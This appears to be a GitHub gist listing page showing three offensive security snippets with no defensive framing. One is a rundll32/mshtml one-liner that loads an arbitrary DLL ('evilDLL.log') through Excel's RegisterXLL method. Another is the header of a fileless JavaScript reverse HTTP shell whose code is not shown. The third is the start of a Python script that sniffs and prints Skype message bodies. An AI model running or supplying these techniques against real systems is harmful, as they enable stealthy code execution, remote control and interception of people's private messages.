Skip to content

Instantly share code, notes, and snippets.

@NoobieDog
NoobieDog / excel.bat
Created July 12, 2017 14:08 — forked from ryhanson/ExcelXLL.md
Execute DLL via the Excel.Application object's RegisterXLL() method
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
@NoobieDog
NoobieDog / JSRat.ps1
Created January 24, 2016 23:02
Fileless JavaScript Reverse HTTP Shell
<#
Author: Casey Smith @subTee
License: BSD3-Clause
.SYNOPSIS
Simple Reverse Shell over HTTP. Execute Commands on Client.
@NoobieDog
NoobieDog / skype_sniffer.py
Last active October 29, 2015 12:36 — forked from PaulSec/skype_sniffer.py
Simple Skype Sniffer
import Skype4Py
def Commands(message, status):
if status == 'SENT' or (status == 'RECEIVED'):
print message.Body
skype = Skype4Py.Skype()
if not skype.Client.IsRunning:
print "Skype not running"